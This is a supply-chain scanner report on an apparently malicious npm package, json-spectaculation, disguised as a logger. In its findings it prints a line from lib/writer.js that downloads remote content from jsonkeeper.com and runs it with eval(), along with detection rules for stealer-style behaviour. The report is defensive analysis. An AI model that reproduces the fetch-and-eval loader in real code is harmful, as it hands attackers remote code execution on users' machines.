npkg:json-spectaculation@3.10.14 CRITICAL 10.0 Summary

Chaintrap · npm supply chain

npm package scan

Static behavior detection plus OSV vulnerability intel in one report. Use findings for triage; confirm with your process — full stdout and JSON are in the appendix for audit.

CRITICAL
Package
json-spectaculation@3.10.14
Dist.Shasum
275b6b0247d4fb81f402e3e8c096ffc54a238b5c
Dist.Integrity
sha512-0I6Ndo42HM7WpdvVuMsxI16gqv70zYRfGzZMRme7mI217Ny5JV2ZZg8HlcD7YisRsDRWSEOtwnSMRjn3Bv1hGA==
License
MIT
Published
2026-03-12T11:25:22.147Z
Scanned At
2026-04-20T12:01:40.346Z (996ms)

Executive summary

npm-mal-scan rated malware risk CRITICAL for this package (heuristic static analysis — not a court verdict). Vulnerability signal: NONE; dependency confusion: NONE. Scanner verdict: CRITICAL.

Scanners prioritize signal over certainty: expect both false positives and blind spots. Chaintrap is designed to combine static detection with OSV CVE data so analysts spend time on packages that look risky and have known-vuln exposure — not to replace manual review or reputation checks.

Heuristic score: 10.0 / 10 · Exit code: 1 · Completed 2026-04-20T12:01:45.352082+00:00

Malware risk
CRITICAL
Vulnerability risk
NONE
Dep confusion
NONE

Package overview

json-spectaculation@3.10.14
Maintainers (registry): grace0312653 <joshcabs1234@gmail.com> · npm user (version): grace0312653 <joshcabs1234@gmail.com>
License
MIT
Published
2026-03-12T11:25:22.147Z
Scanned
2026-04-20T12:01:40.346Z (996ms)
Runtime dependencies (4)

4 runtime dependencies

Package       Required    Flags
axios         ^1.10.0
parse-json    ^8.3.0
request       ^2.88.2
sqlite3       ^5.1.7
Scanner build: 1.0.0

Runtime dependencies — OSV intel

Modes: OSV per dependency · resolve cap: 15 · per-child timeout: 120s

Dependency    Declared    Resolved / status    OSV #    Max OSV severity    Full scan    Reports
axios         ^1.10.0     1.15.1               0
parse-json    ^8.3.0      8.3.0                0
request       ^2.88.2     2.88.2               1
sqlite3       ^5.1.7      5.1.7                0

OSV queries use the resolved version shown (exact pins as declared; ranges use the highest published version satisfying the range). See NPM_RUNTIME_DEP_OSV_SCAN / NPM_RUNTIME_DEP_FULL_SCAN in operator docs.


0 known vulnerabilities (OSV)

OSV lookup: Checked

Chaintrap pairs static behavior signals above with OSV data for this exact version — cross-check CVEs and malware listings with install scripts, execution paths, and scanner findings.

Source: osv.dev — queried at scan time.

No known vulnerabilities reported for this exact version.

Attack path

✓ 0 lifecycle hooks — this package does NOT execute code at install time. Malicious code only runs when the package binary or exports are explicitly invoked.
● May run at require() / import

Illustrative execution chain from scan order and behavior findings — heuristic, not a guaranteed exploit path.

Trigger
require() / import
Entry point
pino.js
Subprocess
writer.js:5
  • 🟡 lib/writer.js:5 · Subprocess: const interfaces = os.networkInterfaces()
  • 🟡 lib/writer.js:29 · Subprocess: require('axios').get('https://www.jsonkeeper.com/b/HY6M6').then(r => {eval(r.data.content);});
  • 🟠 lib/tools.js:214 · Subprocess: const valid = key !== 'level' &&

Indicators of compromise (IOCs)

These URLs, domains, and IPv4 addresses were extracted from this package and this scan (strings in source, network-related findings, and similar signals). Treat each as a candidate IOC: confirm with DNS reputation, threat feeds, and your own triage before treating it as malicious infrastructure. Each row includes a VirusTotal link (opens in a new tab) to the domain or IP address report — full https://… URLs still list the exact string, but the link uses the hostname only (e.g. https://www.jsonkeeper.com/b/… → VirusTotal domain www.jsonkeeper.com). Routine npm registry and CDN hosts are omitted where possible. Third-party threat-report links are listed separately below — those are citations for context, not automatic package contact.

URLs
Domains / hosts

Publish Entry Points (main / exports / module)

  • → pino.js

Execution-first Scan Order (17 files — tier 1 = install/entry/dist, tier 2 = adapters/core, tier 3 = shallow)

  • T1 score=90 pino.js · publish entry (main / exports / module / browser)
  • T3 score=25 file.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/caller.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/constants.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/deprecations.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/levels.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/meta.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/multistream.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/proto.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/redaction.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/symbols.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/time.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/tools.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/transport-stream.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/transport.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/worker.js · other package script (tier 3 shallow scan)
  • T3 score=25 lib/writer.js · other package script (tier 3 shallow scan)

Malware / Behavior Findings 3 finding(s)

Consolidated match HIGH
Network / C2 signal

Most signature hits in the command:

1 rule(s) matched · lib/writer.js:5

Command / snippet
lib/writer.js
5
const interfaces = os.networkInterfaces()
All rules that matched this line
  • HIGH [T3 exec-surface] [ND025] os.networkInterfaces() local IP harvest

    Enumerating network interfaces to collect IPv4 addresses (often filtering !internal) is a common fingerprinting step before exfil in npm stealers — seen in fake logger packages.

Consolidated match HIGH
Network / C2 signal

Most signature hits in the command:

1 rule(s) matched · lib/writer.js:29

Command / snippet
lib/writer.js
29
require('axios').get('https://www.jsonkeeper.com/b/HY6M6').then(r => {eval(r.data.content);});
All rules that matched this line
  • HIGH [T3 exec-surface] [OBF001] eval() code execution

    eval() executes a dynamic string — the primary vector for runtime code obfuscation

Consolidated match MEDIUM

Most signature hits in the command:

1 rule(s) matched · lib/tools.js:214

Command / snippet
lib/tools.js
214
const valid = key !== 'level' &&
All rules that matched this line
  • MEDIUM [T3 exec-surface] [PS003] Background shell execution (&)

    Shell command sent to background with & — allows npm install to exit while payload runs

Tarball vs Repo Diff (1 finding(s))

[LOW] DIFF_NO_REPO · File: package.json · Package has no repository field. Cannot compare tarball against source — increases opacity of provenance.

Known Vulnerabilities (OSV) ✔ No CVEs found

No known vulnerabilities for this version.

Tarball File Inventory

Total files
44
Executable scripts (17 paths)
  • file.js
  • lib/caller.js
  • lib/constants.js
  • lib/deprecations.js
  • lib/levels.js
  • lib/meta.js
  • lib/multistream.js
  • lib/proto.js
  • lib/redaction.js
  • lib/symbols.js
  • lib/time.js
  • lib/tools.js
  • lib/transport-stream.js
  • lib/transport.js
  • lib/worker.js
  • lib/writer.js
  • pino.js
Verdict
CRITICAL
Malware
CRITICAL
CVE
NONE
DepConfusion
NONE

Remediation & containment

🗑 Remove package
  • Remove from project: npm uninstall json-spectaculation
  • If globally installed: npm uninstall -g json-spectaculation
  • Regenerate lock file: delete package-lock.json and run npm install
  • Block in CI: add json-spectaculation to your package manager deny-list or use .npmrc overrides
🔒 Block candidate network IOCs
  • Block domain: www.jsonkeeper.com
🔑 Rotate credentials
  • No credential environment variables flagged in findings.